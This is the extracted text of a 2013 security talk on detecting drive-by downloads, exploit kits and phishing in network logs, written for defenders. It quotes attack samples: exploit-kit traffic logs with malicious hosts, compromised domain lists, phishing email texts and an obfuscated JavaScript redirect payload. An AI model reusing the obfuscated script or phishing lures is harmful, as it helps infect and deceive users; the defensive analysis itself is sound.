Upload
blah-
View
104
Download
0
Embed Size (px)
DESCRIPTION
Citation preview
DISSECTING RAW DATA: finding needles in the haystack
or the way to survive in the Dangerous Russian Environment
Fyodor Yarochkin Vladimir Kropotov Vitaly Chetvertakov May 2013, Moscow
About the speakers
Common interest: investigating unlawful activities for fun and profit ;-)
We can't spell. All mistakes are ours :)All the pictures used in this prezo are (c) googled ;-)
Agenda
●Methodology of dealing with emerging threats●Case studies●Automation techniques and tools●Q&A
Overview
● Understand threats● Real time visibility● You owned. Your
actions?● Owned: finding who
targets you, what data they want. What's been compromised
Prepare
Protect
Investigate
Detect
Getting ready :)
PREPARE
Initial network compromise: threats
●DbD attacks●Email as attack vector●Direct attacks against servers
Client-targeting attacks are on the rise
EASY!
Bigger number of
targets!
Users cumulative IQ
< 0! ;-)
Drive-By in Nutshell :)
● Visit an infected site (any banner network can be a lead too)
● Traffic distribution/TDS (not compulsory)● Target Identification (javascript exploit
selection)● Exploit● Payload (.exe)● Profit!
STILLBIG!!
DBD attacks
● Easy to collect samples
● Payload sent over the wire in plain
● Easy to automate analysis with sandbox
● Payload is typically encoded (XOR) or encrypted
● Exploit triggered on user events
● Serve once per IP, Blacklisting
Before... Now
APT!APT!
APT!
APT!
APT!
APT! APT! APT!APT!
APT!
APT!APT!
APT!
APT!
APT!
So, what is APT?
Someone wants YOUR stuff :-)
Drive by .. are you a target?
● A single exploit● Served to limited
range of IP address (some times)
● Payload behavior is very specific
● Exploit packs● Generic Exploit
packs (Redkit, Nitrino, famous Blackhole etc)
● Payload vary
APT Not APT
APT-related driveby example
● Does not include many exploits
● Is not using any off-shelf exploit pack
● Exploit code changes
often
APT example cont..
● Binary pattern payload. VM sandbox detection
Call-back analysis
Bot vs Human
Exploit packs and kits
Bodyless Bot
GET;http://demonsstoryboard.pw/80F5;HTTP/1.1
95.211.7.3
200 57505 http://234x120.adv.vz.ru/cgi-bin/iframe/vz?1787&options=N
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://demonsstoryboard.pw/080F5wj;HTTP/1.1
95.211.7.3
200 20380 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
GET;http://demonsstoryboard.pw/180F5wj;HTTP/1.1
95.211.7.3
200 135534 - Java/1.7.0_07 application/octet-stream
Exploit kits in your log
Crosss-domain
GET;http://teware.info/crossdomain.xml;HTTP/1.1
62.109.7.187 200
391 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows)
text/xml
GET;http://teware.info/counter/hit/client_de5df061c99066d82cfc437f2b099455;HTTP/1.1
62.109.7.187 200
826 http://www.divetour.su/admin/lang/EN/logit.swf
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://isxops.info/ocycytyruwewufibegidutivabi;HTTP/1.1
82.146.56.201
200
27206 http://www.divetour.su/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzoxym;HTTP/1.1
188.120.230.94
200
9926 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/3dr
GET;http://tolizuhifa.ghmarspi.in.ua/ebyhoducibe;HTTP/1.1
188.120.230.94
200
164332
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/executable
GET;http://dapru.crackedsidewalks.com/viewforum.php?b=75c3d28;HTTP/1.1
37.9.52.21
200
949
http://verygoodcom.net/forum/viewtopic.php?f=31363995&t=45869451
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://dapru.crackedsidewalks.com/profile.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1
37.9.52.21
200
647
- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
GET;http://dapru.crackedsidewalks.com/y41gr.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1
37.9.52.21
403
295
- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
-
Get 0wned quick!
Domain-rotation techniques
http://olgaclaroto.com/mikcxwe.php
http://fcslavutich.ck.ua/nmwdbvg.php
http://temizayakkabi.com/larwyyo.php
http://familystori.com/mhwrdaw.php
http://www.residensea.jp/xuaioxc.php
http://firenzeviaroma.ru/dqryony.php
http://sphynxtoutnu.com/dnqaibb.php
http://www.icmjapan.co.jp/dgttcnm.php
http://www.controlseal.nl/yolelkx.php
http://ural.zz.mu/ledstsn.php
http://www.fotobit.pl/cpjjpei.php
http://bgcarshop.com/tgghhvy.php
http://www.borkowski.org/fudbqrf.php
http://shop.babeta.ru/puthnkn.php
http://e-lustrate.us/mycbbni.php
http://notarypublicconcept.com/shfvtpx.php
http://www.stempelxpress.nl/vechoix.php
http://64.68.190.53/dqohago.php
http://likos.orweb.ru/oydochh.php
http://wap.warelex.com/parpkeu.php
http://caglayandalgicpompa.com/vgptlav.php
http://v-madrid.ru/iqsjnvl.php
http://www.tamandhiep.com/caectvo.php
http://bulgurluhamami.com/wyscthy.php
http://pcprint.es/xymijte.php
http://genckoltukdoseme.com/jydudjd.php
http://www.mgftools.com/fakmgbv.php
http://ohtparis.com/msmfguo.php
http://kenankocticaret.com/myrivrk.php
http://restaurangmaskiner.net/rwuwkqx.php
http://fvp.nau.edu.ua/uhetymf.php
http://kontra-antiabzocker.net/xubolww.php
http://artmaster39.ru/jtfsajd.php
http://drcalotti.com/llfisbj.php
http://adult-toy.ru/immjdti.php
http://corumhaberi.com/ugfrcal.php
http://opr.kz/jwcxbwi.php
http://peggysmith.nl/thtaywn.php
http://nic-ram.com/jqdkfrh.php
http://minsociety.org/djafssg.php
Domain rotation victims
● Over 500 compromised domains in 24 hours
● Domain rotation once per minute (3 minutes in the other incident)
TDS injections
GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1.1
37.10.104.72
200
640
http://www.english-shoes.ru/products/41/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.72
200
442
http://www.english-shoes.ru/products/41/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html;HTTP/1.1
31.7.184.194
200
1578
3
http://ctgwllr.changeip.name/uqrojdt/2
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5;HTTP/1.1
31.7.184.194
200
466
http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/901212121255;HTTP/1.1
31.7.184.194
200
1001
http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/text.jar;HTTP/1.1
31.7.184.194
200
8772
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/x-jar
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/0256000045/6799928;HTTP/1.1
31.7.184.194
200
8636
4
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
Electronic Mail as attack vector
● Email is another common method for an adversary to put a foot into the target network.
● Attractiveness:● Low profile (you only send emails to those
who you want to comromise)● Easy antivirus bypass (password-packed zip
archives anyone?:)● Users are generally – idiots ;-)
Email as attack vector.. are you a target?
● Single exploit● Content of the mail is
accurate to context● Specific payload
behavior (stats)
● Mass-mailed● Often no exploit used
(.exe in attach)
APT? Non-targeted
APT through email.. An RTF document
(CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability." )
Payload writes a dll fileRecent build date (2013)Autorun for persistence
Calls back to C2 server groupSuspicious user Agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2) Mozilla/4.0 (compatible)
How to catch...
● Suspicious agents – works nicely (and easy to implement with snort, surricata, etc)
● Time-series traffic analysis
Emerging Threats has a large number of APT related sigs. Take-and-modify :)
Owning a network..
● Vulnerabilities seen in use through this attack vector:
Adobe Acrobat readerCVE-2013-0640CVE-2012-0775Adobe flash playerCVE-2012-1535
MS OfficeCVE-2012-0158CVE-2011-1269CVE-2010-3333CVE-2009-3129
JavaCVE-2013-0422CVE-2012-1723CVE-2012-5076
But...
● Human stupidity is exploited more than ever..
Email with a password protected archive or a document
● Password protected archives bypass AV checks, firewall/WAF/.. detection
● No exploit. Executable File is masked as document (icon, extension)
● Message contents motivates user to open the attachment (social engineering)
Добрый день, По результатам проверки, у нашей фирмы обнаружился долг перед Вами за январь насумму 9540 рубл. Наш главбух составила акт сверки и просит подписать данный акти выслать его скан. А также спрашивает, что лучше написать при переводе средств._____________________________________________________________________________________
С уважением, комерческий директор ОАО "М-ТОРГ"Маркина Ольга Алексеевна
ps. акт сверки в приложении к письму, пароль к архив 111
Lets look at some examples
Добрый день,По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере Вами задекабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит подписатьданный акт и выслать его скан. А также спрашивает, что лучше написать при переводесредств. _______________________________________________________________________________
С уважением, бухгалтер ЗАО "МСК"Калинина Вера Владимировна
ps. акт сверки в приложении к письму, пароль к архиву 123
Examples (cont...)
Good afternoon, According to the results of the audit, our firm will transfer the debt to you for? December 2012. in the sum of 49540 rubles. Our chief accountant make an act of reconciliation and asked to sign the act and send it’s scan. ______________________________________________________________________________Sincerely, Accountant of "MSK"? Vera V. Kalinina P.s. statement attached to the letter, the password for the archive 123
Unpacked file
.. and inside archive :)
Subject: British Airways E-ticket receiptse-ticket receiptBooking reference: 05V9363845Dear,Thank you for booking with British Airways.Ticket Type: e-ticketThis is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)Yours sincerely,British Airways Customer ServicesBritish Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.How to contact usAlthough we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.If you require further assistance you may contact usIf you have received this email in errorThis is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
Another example
Another variation: email that contains masked links to malicious
pages•No attachment. The message text is html/text points to the same resource
•All links are 'masked' to be pointing to legit links
•The same attreactive text of the message
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>
Encoded redirect..
Hot topic for big company, Cyprus Crisis
Diana Ayala saw this story on the BBC News website and thought you should see it. ** Cyprus bailout: bank levy passed parliament already! **Cyprus can amend terms to a bailout deal that has sparked huge public anger....< http://www.bbc.com.us/go/em/news/world-cyprus-57502820> ** BBC Daily E-mail **Choose the news and sport headlines you want - when you want them, all in one daily e-mail< http://www.bbc.co.uk/email> ** Disclaimer **The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:Package Type: QTR/YE ReportingCourier: UPS GroundEstimated Time of Arrival: Tusesday, 5:00pmTracking Number (if one is available for this package): 1Z023R961390411904Details: Click here to view and/or modify orderWe will notify you via email if the status of your delivery changes.--------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com:o Payroll and Tax Calculatorso Order Payroll Supplies, Blank Checks, and moreo Submit requests online such as SUI Rate Changes, Schedule Changes, and moreo Download Product Documentation, Manuals, and Formso Download Software Patches and Updateso Access Knowledge Solutions / Frequently Asked Questionso Watch Animated Tours with Guided Input InstructionsThank You,ADP Client Servicessupport.ADP.com--------------------------------------------------------------------------------
This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
What happens if you click..
So once we have the basic knowledge, lets move on :)
DETECT
We will spend a bit more time discussing detection activities.
Because this is what we primarily do :)
So how you detect attacks in your traffic..
What to look for..• Search for randomly generated
domains• Search for 3rd level domains with
dynamic dns prefixes (dyndns, dnsdojo and e.t.c.)
• Search by known malware IPs• Search by known constant parts in
URLs and domain names• Search by intermediate domains that
used in attack
• Banner networks simulation• DGA generated domains• Compromised domains• dyndns• Time-based redirects (9 till 6pm Moscow time)• Using not standard ports • Once per IP per day• Blacklists (Yes! They blacklist us too)
Common Counter-Detection Techniques
1)MIME type • application\java-archive,
application\x-jar, application\3dr for Java Exploits
• application\PDF for Acrobat reader Exploits
• application\x-shockwave-flash for adobe flash player
2) User agent (Mozilla(Windows ...)•
Things to look for..
Example..
• Exploit code/Malware components in Temp folder• activity of installer malware• Detect bruteforce attacks for standard a/c: admin, guest• Look for other suspicious IDS events
HTTP_Probe, SMB_Probes etc
Other things to pay attention to...
Antivirus find exploit in cache -> we was attacked -> antivirus saves us! ;-)
The exploit can be in cache – AV finds it :)
AV logs – useful ;)
Antivirus detect malware modules
PROTECT
Approaches
Identify impactand isolate impacted machines
Exploit features of exploit kits to immunize your network
Attacker wants to serveonce per IP...
● Automate visits to exploit pack serving points from your Client Honeybox/VM.
● Magic – exploit is not served to your users anymore.
Exploiting Redundancy Properties in the malware
distribution and postinfection
activities campaigns
INVESTIGATE
DNSLyzer
http://github.com/fygrave/dnslyzer/
Not only payload used as transition (covert channel in URL)
● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0
GET READY FOR AV TROLL!! :)
Strange things happen on the wire;)
Useful tools
● AOL Moloch https://github.com/aol/moloch
APT mail
● Xecure-lab APT document scanner
TIPS
Encrypted payload in not targeted attacks
● If full attack session was not collected (e.g. traffic dumps) don't waste vendors time
● Block all unrecognized/ uncategorized content (Default Deny) or you get FN at all intermediate (transit) hosts
Be careful to share/check online samples especially for targeted
attacks
● Vendors are sharing while attackers monitor changes
● FP ~ your shared some internal staff (especially not executable files, like office documents) with third party = security policy violation
Monitoring VS Protection
● Strange, but true
Efficiency(Monitoring)~O(1/ Efficiency(Protection))
Incident Mitigation VS Investigation
● If your preparation is not enough
Efficiency(Mitigation)~ O(1/ Efficiency(Investigation))
● If you prepared, almost all steps of Investigation you can do asynchronously
Tracking Activity in the organization in 3rd party networks
● Examples in the presentation related to incidents in the third party networks and reproduced in the attacker desirable, but adopted environment.
DISCLAIMER
Q & A